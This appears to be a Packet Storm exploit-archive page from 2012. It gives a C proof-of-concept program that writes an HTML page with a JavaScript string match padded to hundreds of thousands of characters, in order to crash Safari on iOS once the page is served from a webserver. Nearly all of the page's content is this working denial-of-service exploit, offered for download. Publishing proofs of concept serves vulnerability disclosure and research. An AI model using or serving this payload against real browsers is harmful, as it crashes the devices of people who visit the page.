what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Safari On iOS Denial Of Service

Safari On iOS Denial Of Service
Posted Jun 8, 2012
Authored by Larry W. Cashdollar

Proof of concept crash exploit for Safari on iOS that leverage a denial of service vulnerability.

tags | exploit, denial of service, proof of concept
systems | apple
SHA-256 | b7aed7d45d2d8c141f4d038fb1e6bb148bd5d8c687b4740e140f2b04997e86d9

Safari On iOS Denial Of Service

Change Mirror Download
/*PoC for Safari crash discovered by
Alberto Ortega @a0rtega, alberto[@]pentbox[.]net

http://www.livehacking.com/category/vulnerability/apple-vulnerability/
This PoC written by
Larry W. Cashdollar http://vapid.dhs.org @lcashdol

This PoC creates an html file to be served out by a normal webserver.
It seems the browsers begin to crash when the output
size is 800000+.
usage: ./safari_crash 800000 /var/www/html/crash.html
*/

#include <stdio.h>
#include <stdlib.h>

int
main (int argc, char *argv[])
{

int x = 0;
FILE *fout;
char *payload = "<html>\n<head><title>Crash Safari PoC";
char *payload2="</title></head>\n<script
type=\"text/javascript\">\nvar s = \"PoC\";\ns.match(\"\0";
char *payload3 = "\");\n</script>\n</html>\0";

if (argc < 3)
{
printf
("Safari Crash PoC\nPlease supply buffer length and filename.\nEx
:%s 800000 crash.html\n",
argv[0]);
exit (0);
}
fout = fopen (argv[2], "w");

fprintf (fout, "%s", payload);
fprintf (fout, "Size : %s x A",argv[1]);
fprintf (fout,"%s",payload2);
while (x < atoi (argv[1]))
{
fprintf (fout, "A");
x++;
}

fprintf (fout, "%s", payload3);
fclose (fout);

return (0);
}
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close